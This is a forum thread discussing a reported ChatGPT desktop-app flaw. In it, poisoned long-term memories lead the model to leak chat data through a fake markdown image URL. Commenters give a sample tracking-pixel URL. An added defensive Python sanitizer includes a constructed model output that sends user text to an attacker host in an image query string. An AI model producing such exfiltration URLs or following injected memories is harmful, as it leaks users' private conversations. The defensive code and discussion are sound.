109 points

tldr

  • it affects the desktop app of chatgpt, but likely any client that features long term memory functionality.
  • does not apply to the web interface.
  • does not apply to API access.
  • the data exfiltration is visible to the user as GPT streams the tokens that form the exfiltration URL as a (fake) markdown image.
70 points

false memories in ChatGPT

33 points

That’s … really bad.

27 points

And extremely predictable

24 points

How is the application able to send data to any website? Like even if you as the legit user explicitly asked it to do that?

24 points

Haven’t read details, but the classic way is to have a system visit: site.com/badimage.gif?data=abcd

Note: That's also how things like email open rates are tracked, and how marketers grab info using JavaScript to craft image URLs.

18 points

This is why every single email client for the past 2+ decades blocks external images? This didn’t occur to the AI geniuses?

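The two comments above describe the channel (a tracking-pixel style image URL carrying data in its query string) and the classic client-side mitigation (refuse to fetch external images). Below is an added illustration, not code from the thread or from any ChatGPT client, of what such a guard looks like for markdown rendered in a chat client: image URLs are only fetched from an assumed allowlisted host, and anything else is replaced with a visible placeholder. The host names and the sample model output are constructed.

```python
import re
from urllib.parse import urlsplit

# Markdown image syntax: ![alt](url "optional title")
IMAGE_RE = re.compile(r'!\[([^\]]*)\]\(\s*(\S+?)(?:\s+"[^"]*")?\s*\)')

# Constructed allowlist: the only host this client will load images from.
ALLOWED_HOSTS = {"cdn.example-chat-app.invalid"}


def classify_image_url(url: str) -> str:
    """Return 'allow', or a short reason why the image must not be fetched."""
    parts = urlsplit(url)
    if parts.scheme != "https":
        return "non-https scheme"
    if parts.hostname not in ALLOWED_HOSTS:
        return "host not on allowlist"
    if parts.query:
        # Even on an allowed host, a query string is a data channel; refuse it.
        return "query string on image URL"
    return "allow"


def sanitize_markdown(text: str):
    """Replace blocked images with a placeholder; return (clean_text, findings)."""
    findings = []

    def repl(m):
        url = m.group(2)
        verdict = classify_image_url(url)
        if verdict == "allow":
            return m.group(0)
        findings.append((url, verdict))  # log for detection, never fetch
        return f"[image blocked: {verdict}]"

    return IMAGE_RE.sub(repl, text), findings


# Constructed sample of model output: a fake image whose URL encodes chat content,
# followed by a legitimate image from the allowlisted host.
SAMPLE = (
    "Sure, here is the summary.\n"
    "![a](https://attacker.invalid/pixel.gif?q=user+said+secret+123)\n"
    "![logo](https://cdn.example-chat-app.invalid/logo.png)"
)

if __name__ == "__main__":
    clean, found = sanitize_markdown(SAMPLE)
    print(clean)
    print(found)
```

The same policy applies whether the image comes from a live response or from a stored memory replayed into a later conversation; the renderer, not the model, decides what gets fetched.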
11 points

IME they usually proxy and/or prefetch images for caching instead of blocking them. Only spam content is blocked by default.

20 points

I don’t understand. Why can’t ChatGPT be a good bot and keep a secret?

38 points

It’s a very OpenAI

6 points

Except when you ask it how it works


Technology

!technology@lemmy.world